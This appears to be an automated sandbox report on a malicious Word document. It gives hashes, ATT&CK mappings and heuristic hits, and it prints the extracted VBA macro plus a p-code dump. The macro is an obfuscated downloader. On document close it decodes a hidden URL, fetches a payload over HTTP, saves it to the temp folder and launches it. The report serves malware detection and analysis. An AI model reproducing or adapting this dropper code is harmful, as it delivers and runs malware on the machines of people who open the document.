Office (OLE) malware analysis — malicious · e283eaeba986e437

MALICIOUS

Office (OLE)

168.0 KB Created: 2016-06-27 09:12:00 Authoring application: Microsoft Office Word First seen: 2018-08-05

MD5: 245a22dbd3fc6a6e216fc064919c7523 SHA-1: c23a70d7c67fd89fe88668f4fda0462402aa33cb SHA-256: e283eaeba986e4376cf648feef0a775b6601ad472512787b7bedf766f40d6c47

310 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample contains VBA macros that utilize `CreateObject` and `URLDownloadToFile` to download and execute a second-stage payload. The macro attempts to download content from the reconstructed URL "Ucr^%j3jUf4iS0G%/%#mXm~mC$a_rdVlaeq_9Y![l$Mh`e-", "SY2k&dbYz$pY\eWch%D7KY3Y{[of,j:$f[inp[gV". The presence of a `Document_close` subroutine and the `CreateObject("Shell.Application")` call indicate an attempt to execute arbitrary code. The heuristic firings strongly support this downloader behavior.

Heuristics 9

ClamAV: Doc.Downloader.Generic-6922826-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-6922826-0
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD

Reference to URLDownloadToFile API
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
Matched line in script
```
MVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVY = WJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKO.responseBody
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Set CMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEII = CreateObject("Shell.Application")

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Matched line in script

HYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSIUDJDCYIHSKPSQWFFPQVHXMUKNXBVM = Environ("tmp") + QPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPX("%`$R*D`H'I6HaJeCf@~C@$.[anq[pY")

Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.w3.org/1999/02/22-rdf-syntax-ns# Referenced by macro
- http://ns.adobe.com/photoshop/1.0/Referenced by macro
- http://ns.adobe.com/xap/1.0/mm/Referenced by macro
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#Referenced by macro
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#Referenced by macro
- http://purl.org/dc/elements/1.1/Referenced by macro
- http://ns.adobe.com/xap/1.0/Referenced by macro
- http://ns.adobe.com/tiff/1.0/Referenced by macro
- http://ns.adobe.com/exif/1.0/Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11705 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11705 bytes
SHA-256: `fe60845da7a4fd000818858fc8187d9a376bd46f363ac2580a09b2bb23cd6efe`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_close() Dim HYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSIUDJDCYIHSKPSQWFFPQVHXMUKNXBVM Dim CMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEII Set CMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEII = CreateObject("Shell.Application") Dim WJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKO Set WJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKO = CreateObject("microsoft.xmlhttp") HYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSIUDJDCYIHSKPSQWFFPQVHXMUKNXBVM = Environ("tmp") + QPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPX("%`$RD`H'I6HaJeCf@~C@$.[anq[pY") WJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKO.Open "GET", QPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPX("Ucr^%j3jUf4iS0G%/%#mXm~mC$a_rdVlaeq_9Y![l$Mh`e-\SY2k&dbYz$pY\eWch%D7KY3Y{[of,j:$f[inp[gV"), False WJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKO.send MVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVY = WJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKO.responseBody If WJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKO.Status = 200 Then Set CYIHSKPSQWFFPQVHXMUKNXBVMJKJLEBETHZHJKGSHWPMHRMIOTLLFXLWDKBJDFRLKHQPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIH = CreateObject("adodb.stream") CYIHSKPSQWFFPQVHXMUKNXBVMJKJLEBETHZHJKGSHWPMHRMIOTLLFXLWDKBJDFRLKHQPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIH.Open CYIHSKPSQWFFPQVHXMUKNXBVMJKJLEBETHZHJKGSHWPMHRMIOTLLFXLWDKBJDFRLKHQPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIH.Type = 1 CYIHSKPSQWFFPQVHXMUKNXBVMJKJLEBETHZHJKGSHWPMHRMIOTLLFXLWDKBJDFRLKHQPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIH.Write MVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVY CYIHSKPSQWFFPQVHXMUKNXBVMJKJLEBETHZHJKGSHWPMHRMIOTLLFXLWDKBJDFRLKHQPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIH.SaveToFile HYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSIUDJDCYIHSKPSQWFFPQVHXMUKNXBVM, 2 CYIHSKPSQWFFPQVHXMUKNXBVMJKJLEBETHZHJKGSHWPMHRMIOTLLFXLWDKBJDFRLKHQPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIH.Close End If CMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEII.Open (HYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSIUDJDCYIHSKPSQWFFPQVHXMUKNXBVM) End Sub Private Function QPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPX(ZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSI) Dim KGSHWPMHRMIOTLLFXLWDKBJDFRLKHQPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFE Dim SJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIIN Const JKJLEBETHZHJKGSHWPMHRMIOTLLFXLWDKBJDFRLKHQPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIHPRSOBJFWO = 10 Const PZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHY = 33 Const KCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSIUDJDCYIHSKPSQWFFPQVHXMUKNXBVMJKJLEBETHZHJ = 126 If Len(ZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSI) < 5 Then QPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPX = "" Exit Function End If ZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSI = Mid(ZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSI, 3, Len(ZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSI) - 4) For i = 2 To Len(ZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSI) Step 2 SJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIIN = Asc(Mid(ZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSI, i, 1)) + JKJLEBETHZHJKGSHWPMHRMIOTLLFXLWDKBJDFRLKHQPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIHPRSOBJFWO If SJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIIN > KCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSIUDJDCYIHSKPSQWFFPQVHXMUKNXBVMJKJLEBETHZHJ Then SJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIIN = SJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIIN - KCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSIUDJDCYIHSKPSQWFFPQVHXMUKNXBVMJKJLEBETHZHJ + PZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHY - 1 End If KGSHWPMHRMIOTLLFXLWDKBJDFRLKHQPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFE = KGSHWPMHRMIOTLLFXLWDKBJDFRLKHQPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFE & Chr(SJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIIN) Next QPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPX = KGSHWPMHRMIOTLLFXLWDKBJDFRLKHQPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFE End Function Attribute VB_Name = "NewMacros" Sub IM() ' ' IM Macro ' ' End Sub ' Processing file: /tmp/qstore_agicygct ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 4845 bytes ' Line #0: ' FuncDefn (Private Sub QPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPX()) ' Line #1: ' Dim ' VarDefn send ' Line #2: ' Dim ' VarDefn MVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVY ' Line #3: ' SetStmt ' LitStr 0x0011 "Shell.Application" ' ArgsLd CJHYGSSGKQFOEQYMYFCLDNGLOMRBILMRDZPPGJSWRHFFFHZDHPCCKFGCODSRIDNIEKPHHBBOSYMWMXHNHGDMKVOTWUZIJTUY 0x0001 ' Set MVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVY ' Line #4: ' Line #5: ' Dim ' VarDefn responseBody ' Line #6: ' SetStmt ' LitStr 0x0011 "microsoft.xmlhttp" ' ArgsLd CJHYGSSGKQFOEQYMYFCLDNGLOMRBILMRDZPPGJSWRHFFFHZDHPCCKFGCODSRIDNIEKPHHBBOSYMWMXHNHGDMKVOTWUZIJTUY 0x0001 ' Set responseBody ' Line #7: ' Line #8: ' LitStr 0x0003 "tmp" ' ArgsLd FOEQYMYFCLDNGLOMRBILMRDZPPGJSWRHFFFHZDHPCCKFGCODSRIDNIEKPHHBBOSYMWMXHNHGDMKVOTWUZIJTUYLCQXORBF 0x0001 ' LitStr 0x001E "%`$RD`H'I6HaJeCf@~C@$.[anq[pY" ' ArgsLd Status 0x0001 ' Add ' St send ' Line #9: ' LitStr 0x0003 "GET" ' LitStr 0x0058 "Ucr^%j3jUf4iS0G%/%#mXm~mC$a_rdVlaeq_9Y![l$Mh`e-\SY2k&dbYz$pY\eWch%D7KY3Y{[of,j:$f[inp[gV" ' ArgsLd Status 0x0001 ' LitVarSpecial (False) ' Ld responseBody ' ArgsMemCall Open 0x0003 ' Line #10: ' Ld responseBody ' ArgsMemCall CYIHSKPSQWFFPQVHXMUKNXBVMJKJLEBETHZHJKGSHWPMHRMIOTLLFXLWDKBJDFRLKHQPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIH 0x0000 ' Line #11: ' Ld responseBody ' MemLd ZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSI ' St SaveToFile ' Line #12: ' Ld responseBody ' MemLd KGSHWPMHRMIOTLLFXLWDKBJDFRLKHQPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFE ' LitDI2 0x00C8 ' Eq ' IfBlock ' Line #13: ' SetStmt ' LitStr 0x000C "adodb.stream" ' ArgsLd CJHYGSSGKQFOEQYMYFCLDNGLOMRBILMRDZPPGJSWRHFFFHZDHPCCKFGCODSRIDNIEKPHHBBOSYMWMXHNHGDMKVOTWUZIJTUY 0x0001 ' Set SJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIIN ' Line #14: ' Ld SJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIIN ' ArgsMemCall Open 0x0000 ' Line #15: ' LitDI2 0x0001 ' Ld SJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIIN ' MemSt Type ' Line #16: ' Ld SaveToFile ' Ld SJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIIN ' ArgsMemCall Xor 0x0001 ' Line #17: ' Ld send ' LitDI2 0x0002 ' Ld SJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIIN ' ArgsMemCall JKJLEBETHZHJKGSHWPMHRMIOTLLFXLWDKBJDFRLKHQPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIHPRSOBJFWO 0x0002 ' Line #18: ' Ld SJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIIN ' ArgsMemCall Close 0x0000 ' Line #19: ' EndIfBlock ' Line #20: ' Ld send ' Paren ' Ld MVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVY ' ArgsMemCall Open 0x0001 ' Line #21: ' Line #22: ' Line #23: ' EndSub ' Line #24: ' Line #25: ' FuncDefn (Private Function Status(PZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHY, id_FFFE As Variant)) ' Line #26: ' Dim ' VarDefn KCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSIUDJDCYIHSKPSQWFFPQVHXMUKNXBVMJKJLEBETHZHJ ' Line #27: ' Dim ' VarDefn Asc ' Line #28: ' Dim (Const) ' LitDI2 0x000A ' VarDefn id_028C ' Line #29: ' Dim (Const) ' LitDI2 0x0021 ' VarDefn id_028E ' Line #30: ' Dim (Const) ' LitDI2 0x007E ' VarDefn id_0290 ' Line #31: ' Line #32: ' Ld PZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHY ' FnLen ' LitDI2 0x0005 ' Lt ' IfBlock ' Line #33: ' LitStr 0x0000 "" ' St Status ' Line #34: ' ExitFunc ' Line #35: ' EndIfBlock ' Line #36: ' Line #37: ' Ld PZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHY ' LitDI2 0x0003 ' Ld PZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHY ' FnLen ' LitDI2 0x0004 ' Sub ' ArgsLd Mid 0x0003 ' St PZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHY ' Line #38: ' StartForVariable ' Ld _B_var_Chr ' EndForVariable ' LitDI2 0x0002 ' Ld PZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHY ' FnLen ' LitDI2 0x0002 ' ForStep ' Line #39: ' Ld PZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHY ' Ld _B_var_Chr ' LitDI2 0x0001 ' ArgsLd Mid 0x0003 ' ArgsLd id_0292 0x0001 ' Ld id_028C ' Add ' St Asc ' Line #40: ' Ld Asc ' Ld id_0290 ' Gt ' IfBlock ' Line #41: ' Ld Asc ' Ld id_0290 ' Sub ' Ld id_028E ' Add ' LitDI2 0x0001 ' Sub ' St Asc ' Line #42: ' EndIfBlock ' Line #43: ' Ld KCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSIUDJDCYIHSKPSQWFFPQVHXMUKNXBVMJKJLEBETHZHJ ' Ld Asc ' ArgsLd RTBGQXQKXJIWNVOQEQWTDBMXKGEJSZKEJUSHIXILOJZEEDGRUYNTTCEFBNURJZBLZCJHYGSSGKQFOEQYMYFCLDNGLOMRB 0x0001 ' Concat ' St KCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSIUDJDCYIHSKPSQWFFPQVHXMUKNXBVMJKJLEBETHZHJ ' Line #44: ' StartForVariable ' Next ' Line #45: ' Ld KCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSIUDJDCYIHSKPSQWFFPQVHXMUKNXBVMJKJLEBETHZHJ ' St Status ' Line #46: ' EndFunc ' Macros/VBA/NewMacros - 1013 bytes ' Line #0: ' FuncDefn (Sub EEDGRUYNTTCEFBNURJZBLZCJHYGSSGKQFOEQYMYFCLDNGLOMRBILMRDZPPGJSWRHFFFHZDHPCCKFGCODSRIDNIE()) ' Line #1: ' QuoteRem 0x0000 0x0000 "" ' Line #2: ' QuoteRem 0x0000 0x0009 " IM Macro" ' Line #3: ' QuoteRem 0x0000 0x0000 "" ' Line #4: ' QuoteRem 0x0000 0x0000 "" ' Line #5: ' Line #6: ' EndSub

SHA-256: fe60845da7a4fd000818858fc8187d9a376bd46f363ac2580a09b2bb23cd6efe

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_close()
Dim HYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSIUDJDCYIHSKPSQWFFPQVHXMUKNXBVM
Dim CMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEII
Set CMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEII = CreateObject("Shell.Application")

Dim WJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKO
Set WJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKO = CreateObject("microsoft.xmlhttp")

HYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSIUDJDCYIHSKPSQWFFPQVHXMUKNXBVM = Environ("tmp") + QPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPX("%`$R*D`H'I6HaJeCf@~C@$.[anq[pY")
WJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKO.Open "GET", QPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPX("Ucr^%j3jUf4iS0G%/%#mXm~mC$a_rdVlaeq_9Y![l$Mh`e-\SY2k&dbYz$pY\eWch%D7KY3Y{[of,j:$f[inp[gV"), False
WJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKO.send
MVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVY = WJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKO.responseBody
If WJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKO.Status = 200 Then
Set CYIHSKPSQWFFPQVHXMUKNXBVMJKJLEBETHZHJKGSHWPMHRMIOTLLFXLWDKBJDFRLKHQPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIH = CreateObject("adodb.stream")
CYIHSKPSQWFFPQVHXMUKNXBVMJKJLEBETHZHJKGSHWPMHRMIOTLLFXLWDKBJDFRLKHQPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIH.Open
CYIHSKPSQWFFPQVHXMUKNXBVMJKJLEBETHZHJKGSHWPMHRMIOTLLFXLWDKBJDFRLKHQPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIH.Type = 1
CYIHSKPSQWFFPQVHXMUKNXBVMJKJLEBETHZHJKGSHWPMHRMIOTLLFXLWDKBJDFRLKHQPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIH.Write MVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVY
CYIHSKPSQWFFPQVHXMUKNXBVMJKJLEBETHZHJKGSHWPMHRMIOTLLFXLWDKBJDFRLKHQPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIH.SaveToFile HYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSIUDJDCYIHSKPSQWFFPQVHXMUKNXBVM, 2
CYIHSKPSQWFFPQVHXMUKNXBVMJKJLEBETHZHJKGSHWPMHRMIOTLLFXLWDKBJDFRLKHQPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIH.Close
End If
CMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEII.Open (HYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSIUDJDCYIHSKPSQWFFPQVHXMUKNXBVM)


End Sub

Private Function QPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPX(ZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSI)
 Dim KGSHWPMHRMIOTLLFXLWDKBJDFRLKHQPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIHPRSOBJFWOPZNQWCMTNGTFE
 Dim SJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHYKCHKIOWEIIN
    Const JKJLEBETHZHJKGSHWPMHRMIOTLLFXLWDKBJDFRLKHQPBLXBYEGNXYEIGUDMVFDXNRSRTMJMCIHPRSOBJFWO = 10
    Const PZNQWCMTNGTFESJRLNZNSPYWITGCZGOVGZFQODETEHLGVZZZCNQUJQPXZBWJRNFWXIVYFEUCOOCGMBKZMUIVBXHY = 33
    Const KCHKIOWEIINYWLMCFPTNEBCBDVYDLYXGBCXKYONFYJEZGLDDWWKOUJSIUDJDCYIHSKPSQWFFPQVHXMUKNXBVMJKJLEBETHZHJ = 126

